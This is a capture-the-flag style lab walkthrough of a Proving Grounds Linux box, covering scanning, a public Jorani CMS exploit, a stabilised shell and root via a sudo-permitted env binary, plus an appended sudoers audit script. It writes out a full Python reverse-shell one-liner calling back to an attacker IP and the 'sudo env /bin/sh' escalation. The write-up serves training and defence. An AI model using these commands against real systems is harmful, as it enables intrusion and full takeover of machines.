Jordak Linux Lab Proving Grounds
Moving forward, the first step in a red team pentest is the following:
Cyb0rgBytes · InfoSec Write-ups · ~4 min read · March 23, 2026 (Updated: March 23, 2026)
Whenever we are in a pentest, there are things we have to take into consideration while infiltrating a machine or exploiting its services. There are also different entry points into the target, whether a misconfigured access control or a vulnerability of some sort.
Information gathering: here I'll leverage tools to collect as much information about the target as possible, then use that information to gain access to the system.
Whenever we want to see if the target is up and running, we send ICMP echo requests to check that it's live and online:
Next I'll run a quick scan with nmap: `nmap -sC -sV 192.168.122.109 -oA initial -v`
Then I'll run a full port scan with nmap: `nmap -p- -sC -sV 192.168.122.109 -oA full -v`
Afterwards I'll run an enumeration scan to find web directories that could help us explore the target further: `gobuster dir -u http://192.168.122.109 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --exclude-length 0 -o enum.txt`
From the nmap scan I found the following directory:
/evox/about
Navigating to that webpage, I found the following page:
Leave Management System:
In the bottom right corner there is a version number for the Jorani CMS:
After some research online I found the following exploit for the vulnerability:
https://pentest-tools.com/vulnerabilities-exploits/jorani-100-remote-code-execution_1842
CVE-repository/PoCs/CVE_Jorani.py (Orange-Cyberdefense/CVE-repository on github.com)
Running the exploit against the target got me initial access:
While examining the target's shell I noticed the environment is running in a pseudo-terminal, so the next move is to stabilize the shell so I can execute commands freely. First I run a listener in another terminal: `nc -lnvp 9001`
Afterwards I'll run this Python command to get a better reverse shell: `python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'`
And there we go, a shell was received:
Next I'll run `sudo -l` to see if there is any possible privilege escalation vector through sudo:
Apparently I can run /usr/bin/env as sudo without a password. This is a strong sign that I can escalate privileges with env, so next I'll navigate to GTFOBins and check which executions I can run with env:
By running `sudo env /bin/sh` I successfully get root access on the box!!!
voila :)
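From the defender's side, the misconfiguration that ended this box can be caught before anyone exploits it by auditing `sudo -l` output for rules that hand back a root shell. This is an added example and not part of the original writeup; the sample output, the `www-data` user and the `jordak` hostname are constructed, since the page only shows a screenshot.

```python
import re
from typing import List, Tuple

# Binaries that hand back an interactive shell when allowed through sudo.
# /usr/bin/env is the one abused on this box; the others are common equivalents.
SHELL_CAPABLE = {"env", "sh", "bash", "dash", "zsh", "python3", "perl"}

# One `sudo -l` rule line: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(output: str) -> List[Tuple[str, bool, str, str]]:
    """Return (runas, nopasswd, command, reason) for every rule that yields a root shell."""
    findings = []
    in_rules = False
    for line in output.splitlines():
        # Only the block after this header holds rules; skip the Defaults section.
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(ALL : ALL)" -> "ALL"
        if runas not in ("ALL", "root"):
            continue  # this rule cannot become root
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            words = cmd.split()
            if cmd == "ALL":
                findings.append((runas, nopasswd, cmd, "unrestricted sudo"))
            # A bare binary in sudoers permits any arguments, so env can launch a shell.
            elif len(words) == 1 and words[0].rsplit("/", 1)[-1] in SHELL_CAPABLE:
                findings.append((runas, nopasswd, cmd, "binary can spawn a shell"))
    return findings


# Constructed `sudo -l` output mirroring the misconfiguration found on the box
# (the web user and hostname are assumptions; the page only shows a screenshot).
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on jordak:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on jordak:
    (ALL) NOPASSWD: /usr/bin/env
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for runas, nopasswd, cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if nopasswd else "password required"
        print(f"[!] ({runas}) {cmd}: {reason} [{tag}]")
```

The `systemctl` rule is not flagged because its arguments are pinned in sudoers, which is the fix for the `env` rule as well: name the exact command and arguments, or drop the rule.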
Thank you all for reading my writeups and supporting my content so far; I appreciate every one of you. Currently I'm between jobs and slowly preparing for the OSCP for the long term, for a better career and a better future! If you like my content and would like to follow this inspiring journey, please clap my content as much as possible, follow me and share my articles if you like them. It really means a lot and keeps pushing me further to greatness.
Happy hacking!
#cybersecurity #hacking #pentesting #ctf-walkthrough #infosec